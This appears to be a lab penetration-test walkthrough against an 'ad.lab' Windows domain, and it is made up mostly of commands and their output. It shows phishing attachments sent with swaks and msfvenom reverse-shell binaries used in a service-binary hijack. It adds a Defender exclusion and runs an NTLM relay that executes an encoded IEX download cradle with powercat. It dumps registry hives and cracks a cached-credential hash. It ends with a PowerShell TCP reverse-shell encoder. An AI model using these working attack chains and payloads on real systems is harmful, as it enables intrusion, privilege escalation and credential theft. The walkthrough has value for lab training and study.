└─$ swaks -t daniela@ad.lab --from chris@ad.lab --server 10.10.14.80 --attach @config.Library-ms --attach @powershell.lnk --body @body.txt --header "Subject: Staging Script" --suppress-data
=== Trying 10.10.14.80:25...
=== Connected to 10.10.14.80.
<- 220 MAIL01.AD.LAB Microsoft ESMTP MAIL Service, Version: 10.0.20348.1 ready at Fri, 7 Feb 2025 23:57:09 -0800
-> EHLO kali
<- 250-MAIL01.AD.LAB Hello [10.10.14.10]
<- 250-TURN
<- 250-SIZE 2097152
<- 250-ETRN
<- 250-PIPELINING
<- 250-DSN
<- 250-ENHANCEDSTATUSCODES
<- 250-8bitmime
<- 250-BINARYMIME
<- 250-CHUNKING
<- 250-VRFY
<- 250 OK
-> MAIL FROM:<chris@ad.lab>
<- 250 2.1.0 chris@ad.lab....Sender OK
-> RCPT TO:<daniela@ad.lab>
<- 250 2.1.5 daniela@ad.lab
-> DATA
<- 354 Start mail input; end with <CRLF>.<CRLF>
-> 80 lines sent
<- 250 2.6.0 <20250208025710.028151@kali> Queued mail for delivery
-> QUIT
<- 221 2.0.0 MAIL01.AD.LAB Service closing transmission channel
=== Connection closed with remote host.1: Spawned a medium integrty reverse shell on DEV01, as Daniela
┌──(kali㉿kali)-[~/webdav]
└─$ nc -nvlp 4446
listening on [any] 4446 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.100] 50005
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\System32\WindowsPowerShell\v1.0> whoami; hostname
whoami; hostname
ad\daniela
DEV012. Confirmed we have a Medium Integrity Shell
PS C:\Windows\System32\WindowsPowerShell\v1.0> whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
3. Verified Write Permissions on the Service Directory
PS C:\Windows\System32\WindowsPowerShell\v1.0> icacls "C:\MyService"
icacls "C:\MyService"
C:\MyService NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Users:(OI)(CI)(M)
Successfully processed 1 files; Failed processing 0 files
4. Verified the Service is Configured to Auto-Start
PS C:\Windows\System32\WindowsPowerShell\v1.0> sc.exe qc MyService
sc.exe qc MyService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MyService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\MyService\program.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : MyService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
5. Confirmed we can reboot the system
PS C:\Windows\System32\WindowsPowerShell\v1.0> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled6. Renamed the program in the Service Root Directory to back it up
PS C:\Windows\System32\WindowsPowerShell\v1.0> move "C:\MyService\program.exe" "C:\MyService\bak_program.exe"7. Created a reverse shell binary
┌──(kali㉿kali)-[~/webdav]
└─$ cd ~
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4447 -f exe -o ~/payload4447.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: /home/kali/payload4447.exe
8. Confirmed the Python3 HTTP Server is still Running
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
9. Downloaded the reverse shell binary to the Service Root Directory
PS C:\Windows\System32\WindowsPowerShell\v1.0> wget "http://10.10.14.10:8000/payload4447.exe" -O "C:\MyService\program.exe"
wget "http://10.10.14.10:8000/payload4447.exe" -O "C:\MyService\program.exe"10. Rebooted DEV01 to Trigger the Reverse Shell
PS C:\Windows\System32\WindowsPowerShell\v1.0> shutdown /r /f /t 0
shutdown /r /t 011. Spawned a SYSTEM Reverse Shell on DEV01
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4447
listening on [any] 4447 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.100] 49693
Microsoft Windows [Version 10.0.26100.2894]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32>whoami
whoami
nt authority\system
C:\Windows\System32>hostname
hostname
DEV01
Note: Ensure Apache and MySQL are started on DEV01 before proceeding to the next steps.
12. Examined Network Connections and Found HTTP Listening
C:\Windows\System32> netstat -ano | findstr :80
netstat -ano | findstr :80
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 3712
TCP [::]:80 [::]:0 LISTENING 371213. Download and Prepare Chisel
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_linux_amd64.gz -O chisel_1.10.1_linux_amd64.gz
--2025-02-20 22:26:30-- https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_linux_amd64.gz
Resolving github.com (github.com)... 140.82.112.3
Connecting to github.com (github.com)|140.82.112.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/31311037/1cb6410b-6deb-4214-8793-2685ecacfc34?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250221%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250221T032629Z&X-Amz-Expires=300&X-Amz-Signature=e8dc481ad44184db00fb16ad920037ca0f962c8bb17becad3b0530d6fc092b84&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchisel_1.10.1_linux_amd64.gz&response-content-type=application%2Foctet-stream [following]
--2025-02-20 22:26:30-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/31311037/1cb6410b-6deb-4214-8793-2685ecacfc34?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250221%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250221T032629Z&X-Amz-Expires=300&X-Amz-Signature=e8dc481ad44184db00fb16ad920037ca0f962c8bb17becad3b0530d6fc092b84&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchisel_1.10.1_linux_amd64.gz&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3888423 (3.7M) [application/octet-stream]
Saving to: ‘chisel_1.10.1_linux_amd64.gz’
chisel_1.10.1_linux 100%[================>] 3.71M 7.69MB/s in 0.5s
2025-02-20 22:26:31 (7.69 MB/s) - ‘chisel_1.10.1_linux_amd64.gz’ saved [3888423/3888423]
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_windows_amd64.gz -O chisel_1.10.1_windows_amd64.gz
--2025-02-20 22:27:55-- https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_windows_amd64.gz
Resolving github.com (github.com)... 140.82.113.4
Connecting to github.com (github.com)|140.82.113.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/31311037/5938e0c3-b608-40ce-904a-a04a54a20fdd?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250221%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250221T032755Z&X-Amz-Expires=300&X-Amz-Signature=ed045079dba9cb11ebdb38c0ca472e17e09bf8f3baf3b4dd456f87257d139e30&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchisel_1.10.1_windows_amd64.gz&response-content-type=application%2Foctet-stream [following]
--2025-02-20 22:27:56-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/31311037/5938e0c3-b608-40ce-904a-a04a54a20fdd?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250221%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250221T032755Z&X-Amz-Expires=300&X-Amz-Signature=ed045079dba9cb11ebdb38c0ca472e17e09bf8f3baf3b4dd456f87257d139e30&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchisel_1.10.1_windows_amd64.gz&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4020166 (3.8M) [application/octet-stream]
Saving to: ‘chisel_1.10.1_windows_amd64.gz’
chisel_1.10.1_windo 100%[================>] 3.83M 7.69MB/s in 0.5s
2025-02-20 22:27:57 (7.69 MB/s) - ‘chisel_1.10.1_windows_amd64.gz’ saved [4020166/4020166]
┌──(kali㉿kali)-[~]
└─$ gunzip chisel_1.10.1_windows_amd64.gz
┌──(kali㉿kali)-[~]
└─$ gunzip chisel_1.10.1_linux_amd64.gz
┌──(kali㉿kali)-[~]
└─$ mv chisel_1.10.1_windows_amd64 chisel.exe
┌──(kali㉿kali)-[~]
└─$ mv chisel_1.10.1_linux_amd64 chisel
┌──(kali㉿kali)-[~]
└─$ chmod +x chisel
14. Started Chisel Server in Kali
┌──(kali㉿kali)-[~]
└─$ ./chisel server --port 8080 --reverse
2025/02/15 19:53:23 server: Reverse tunnelling enabled
2025/02/15 19:53:23 server: Fingerprint PJIU/uHky+UyCcoAnGNRNSH0Ml9XmHCryj2PytI2rDc=
15. Added a Windows Defender Directory Exclusion to Allow Chisel Upload
C:\Windows\System32> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\System32> Add-MpPreference -ExclusionPath "C:\Users\Public"
Add-MpPreference -ExclusionPath "C:\Windows\Public"16. Download Chisel Client to C:\Users\Public
PS C:\Windows\System32> wget http://10.10.14.10:8000/chisel.exe -O C:\Users\Public\chisel.exe
wget http://10.10.14.10:8000/chisel.exe -O chisel.exe17. Launched Chisel Client to Establish a Reverse HTTP Tunnel to Kali
PS C:\Windows\System32> cd "C:\Users\Public"
cd "C:\Users\Public"
PS C:\Users\Public> .\chisel.exe client 10.10.14.10:8080 R:80:127.0.0.1:80
.\chisel.exe client 10.10.14.10:8080 R:443:127.0.0.1:80
Back on Chisel Server:
2025/03/21 17:39:13 server: session#1: tun: proxy#R:80=>80: Listening
18. Retrieved HTTP headers from the WordPress login page to confirm its availability and server configuration.
┌──(kali㉿kali)-[~]
└─$ curl -I http://127.0.0.1/wordpress/wordpress/wp-login.php
HTTP/1.1 200 OK
Date: Sat, 08 Feb 2025 08:25:55 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/wordpress/wordpress/
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=UTF-819. Accessed the WordPress login page and use the previously AS-Rep Roasted Credentials to Log In.
┌──(kali㉿kali)-[~]
└─$ firefox http://127.0.0.1/wordpress/wordpress/wp-login.php
Login Credentials:
ernesto@ad.lab
lucky#1
(Note: You may have to submit the login form twice)
20. Viewed the "Backup and Migration" plugin:
a. In Wordpress, go to: "Dashboard" > "Settings" > "Backup and Migration"
(Found an input field, for a network share.)
21. Generate a base64 encoded reverse shell payload.
┌──(kali㉿kali)-[~]
└─$ pwsh
PowerShell 7.2.6
Copyright (c) Microsoft Corporation.
https://aka.ms/powershell
Type 'help' to get help.
┌──(kali㉿kali)-[/home/kali]
└─PS> $Text = "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.10:8002/powercat.ps1');powercat -c 10.10.14.10 -p 4448 -e powershell"
┌──(kali㉿kali)-[/home/kali]
└─PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
┌──(kali㉿kali)-[/home/kali]
└─PS> $Encoded = [Convert]::ToBase64String($Bytes)
┌──(kali㉿kali)-[/home/kali]
└─PS> $Wrapped = "powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand $Encoded"
┌──(kali㉿kali)-[/home/kali]
└─PS> $Wrapped
powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAwADoAOAAwADAAMgAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA7AHAAbwB3AGUAcgBjAGEAdAAgAC0AYwAgADEAMAAuADEAMAAuADEANAAuADEAMAAgAC0AcAAgADQANAA0ADgAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsAA==
┌──(kali㉿kali)-[/home/kali]
└─PS> exit
22. Used impacket-ntlmrelayx to relay Franesca’s NTLM authentication to ADMIN04, execute the encoded PowerShell command and establish a SYSTEM reverse shell on ADMIN04.
┌──(kali㉿kali)-[~]
└─$ sudo systemctl stop smbd
┌──(kali㉿kali)-[~]
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.14.120 -c "powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAwADoAOAAwADAAMgAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA7AHAAbwB3AGUAcgBjAGEAdAAgAC0AYwAgADEAMAAuADEAMAAuADEANAAuADEAMAAgAC0AcAAgADQANAA0ADgAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsAA=="
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled
[*] Servers started, waiting for connections
23. Staged the Powercat Script for Remote Execution
┌──(kali㉿kali)-[~]
└─$ find / -name powercat.ps1 -type f 2>/dev/null
/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1
┌──(kali㉿kali)-[~]
└─$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 ~/webdav/powercat.ps124. Confirmed the Python3 HTTP Server is still Running
┌──(kali㉿kali)-[~/webdav]
└─$ python3 -m http.server 8002
Serving HTTP on 0.0.0.0 port 8002 (http://0.0.0.0:8002/) ...25. Executed a UNC Path, (Kali IP and an arbitrary SMB share name):
a. Backup Storage Location (UNC Path):\\10.10.14.10\test
b. Windows Username: [arbitrary value]
c. Windows Password: [arbitrary value]
d. Click "Save Changes"
e. Click "Test Connection" to trigger the reverse shell.
Connection Test Result:
Failed to open: \\10.10.14.10\test\
Ensure OS-level credentials are set or the service user has permissions.
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.14.100, attacking target smb://10.10.14.120
[*] Authenticating against smb://10.10.14.120 as AD/FRANCESCA SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Executed specified command on host: 10.10.14.120
1: Spawned a Reverse Shell as SYSTEM
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4448
listening on [any] 4448 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.120] 49771
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\System32> whoami;hostname
whoami;hostname
nt authority\system
ADMIN042. Modified the registry to enable Remote Desktop by setting the fDenyTSConnections value to 0.
PS C:\Windows\System32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.3. Enabled Remote Desktop in the Windows firewall
PS C:\Windows\System32> netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
Updated 3 rule(s).
Ok.4. Created a new firewall rule to allow inbound TCP traffic on port 3389, which is used by RDP.
PS C:\Windows\System32> New-NetFirewallRule -DisplayName "Open Port 3389" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Allow
New-NetFirewallRule -DisplayName "Open Port 3389" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Allow
Name : {4d148bf4-6323-4b7b-b15d-e892e23df342}
DisplayName : Open Port 3389
Description :
DisplayGroup :
Group :
Enabled : True
Profile : Any
Platform : {}
Direction : Inbound
Action : Allow
EdgeTraversalPolicy : Block
LooseSourceMapping : False
LocalOnlyMapping : False
Owner :
PrimaryStatus : OK
Status : The rule was parsed successfully from the store. (65536)
EnforcementStatus : NotApplicable
PolicyStoreSource : PersistentStore
PolicyStoreSourceType : Local
RemoteDynamicKeywordAddresses : {}
PolicyAppId :
PackageFamilyName :5. Listed active network connections and listeners filtered by port 3389 to verify that the RDP service is listening.
PS C:\Windows\System32> netstat -ano | findstr 3389
netstat -ano | findstr 3389
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 3048
TCP [::]:3389 [::]:0 LISTENING 3048
UDP 0.0.0.0:3389 *:* 3048
UDP [::]:3389 *:* 30486. Stop impacket-relayx and start Samba
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.14.100, attacking target smb://10.10.14.120
[*] Authenticating against smb://10.10.14.120 as AD/FRANCESCA SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Executed specified command on host: 10.10.14.120
[-] SMB SessionError: code: 0xc0000043 - STATUS_SHARING_VIOLATION - A file cannot be opened because the share access flags are incompatible.
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
^C
┌──(kali㉿kali)-[~]
└─$ sudo systemctl start smbd
[sudo] password for kali:
7. Mounted the Samba Share and Saved Windows Registry Hives (SAM, SYSTEM, SECURITY) to Samba Share
PS C:\Windows\System32> net use \\10.10.14.10\samba /user:kali kali
net use \\10.10.14.10\samba /user:kali kali
The command completed successfully.
PS C:\Windows\System32> reg.exe save hklm\sam \\10.10.14.10\samba\sam.save; reg.exe save hklm\system \\10.10.14.10\samba\system.save; reg.exe save hklm\security \\10.10.14.10\samba\security.save
reg.exe save hklm\sam \\10.10.14.10\samba\sam.save; reg.exe save hklm\system \\10.10.14.10\samba\system.save; reg.exe save hklm\security \\10.10.14.10\samba\security.save
The operation completed successfully.
The operation completed successfully.
The operation completed successfully.8. Confirmed the ADMIN04 Registry Hives were Successfully Downloaded
┌──(kali㉿kali)-[~]
└─$ ls samba
sam.save security.save system.save9. Dumped ADMIN04 Hashes with impacket-secretsdump
┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump -sam ~/samba/sam.save -system ~/samba/system.save -security ~/samba/security.save LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x5b26856cd61750e059093f5a94acffa8
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:78b4cfba2bbf3d1fd4215c906b9a8cc1:::
LocalUser:1001:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
[*] Dumping cached domain logon information (domain/username:hash)
AD.LAB/Francesca:$DCC2$10240#Francesca#e267a6b5bcfa08e0b681b6da47b09e46: (2025-02-16 06:33:49)
AD.LAB/Administrator:$DCC2$10240#Administrator#a01d80260b293cd51b7518b02a74adb3: (2025-02-15 05:19:41)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:4800730044002600480031004e003b007a002e0028002b0049004c007500410062006e007a0038006a007a003b0043007a00770041004b00270048006c007000540075006c0075003000790025006e00570037005700330029007300770073003a0020003f00390058006b004e004c005600340068005a0064003500670075003c0073002200490044005c0046006900290065004f004600510030004d002d00770059006700700046007500200056006b0023004600780078006e006f0041004c002e0025007a003b002e00520035003600700035002f0058005b0078007600450068005400360066002d0025002100
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:fe72f9c0b712a41b62467781048244d0
[*] DPAPI_SYSTEM
dpapi_machinekey:0x42ce1a5ea6754418c5b55b31ad5e8722c74b71c8
dpapi_userkey:0x721b3f63acb4e1630095e0a8f219eec71e4ef431
[*] NL$KM
0000 0C 76 12 21 2C 9E 28 F4 18 3E 16 11 DF 55 1A A8 .v.!,.(..>...U..
0010 14 72 CF 32 B8 EA 23 61 05 F9 31 61 8B 71 03 34 .r.2..#a..1a.q.4
0020 EA A0 78 7C 4A 46 9E F8 29 E8 F8 90 57 D8 E4 04 ..x|JF..)...W...
0030 D5 6A FB 09 FA D5 41 85 DF 27 AB 61 47 E5 86 1B .j....A..'.aG...
NL$KM:0c7612212c9e28f4183e1611df551aa81472cf32b8ea236105f931618b710334eaa0787c4a469ef829e8f89057d8e404d56afb09fad54185df27ab6147e5861b
[*] Cleaning up...
10. Cracked Francesca's Cached Domain Credential Hash with Hashcat, revealing the password "bubbelinbunny_1"
┌──(kali㉿kali)-[~]
└─$ hashcat -m 2100 -a 0 '$DCC2$10240#Francesca#e267a6b5bcfa08e0b681b6da47b09e46' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i9-14900KF, 2865/5795 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344390
* Bytes.....: 139921596
* Keyspace..: 14344390
Cracking performance lower than expected?
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Mode........: 2100 (Domain Cached Credentials 2 (DCC2), MS Cache 2)
Hash.Target......: $DCC2$10240#francesca#e267a6b5bcfa08e0b681b6da47b09e46
Time.Started.....: Sat Feb 8 03:45:37 2025 (1 min, 18 secs)
Time.Estimated...: Sat Feb 8 04:15:13 2025 (28 mins, 18 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 8079 H/s (6.05ms) @ Accel:512 Loops:256 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 622592/14344390 (4.34%)
Rejected.........: 0/622592 (0.00%)
Restore.Point....: 622592/14344390 (4.34%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:7680-7936
Candidate.Engine.: Device Generator
Candidates.#1....: magley -> ls1983
Hardware.Mon.#1..: Util: 95%
$DCC2$10240#francesca#e267a6b5bcfa08e0b681b6da47b09e46:bubbelinbunny_1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 2100 (Domain Cached Credentials 2 (DCC2), MS Cache 2)
Hash.Target......: $DCC2$10240#francesca#e267a6b5bcfa08e0b681b6da47b09e46
Time.Started.....: Sat Feb 8 03:45:37 2025 (2 mins, 4 secs)
Time.Estimated...: Sat Feb 8 03:47:41 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 8093 H/s (6.09ms) @ Accel:512 Loops:256 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1001472/14344390 (6.98%)
Rejected.........: 0/1001472 (0.00%)
Restore.Point....: 999424/14344390 (6.97%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:9984-10239
Candidate.Engine.: Device Generator
Candidates.#1....: bulera -> brittanyrennick
Hardware.Mon.#1..: Util: 96%
Started: Sat Feb 8 03:45:35 2025
Stopped: Sat Feb 8 03:47:42 202511. Initiated an RDP session to ADMIN04 using Francesca's Credentials
┌──(kali㉿kali)-[~]
└─$ xfreerdp3 /cert:ignore /compression /auto-reconnect /u:francesca /p:bubbelinbunny_1 /v:10.10.14.120
[03:53:49:249] [20204:20205] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:53:49:249] [20204:20205] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[03:53:49:290] [20204:20205] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[03:53:49:291] [20204:20205] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[03:53:50:879] [20204:20205] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]
[03:53:50:258] [20204:20205] [WARN][com.freerdp.core.rdp] - pduType PDU_TYPE_DATA not properly parsed, 562 bytes remaining unhandled. Skipping.i
12. Generated a base64 encoded payload for port 4449
┌──(kali㉿kali)-[~]
└─$ vim encode4449.py
import sys
import base64
payload = '$client = New-Object System.Net.Sockets.TCPClient("10.10.14.10",4449);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
cmd = "powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmd)
┌──(kali㉿kali)-[~]
└─$ python encode4449.py
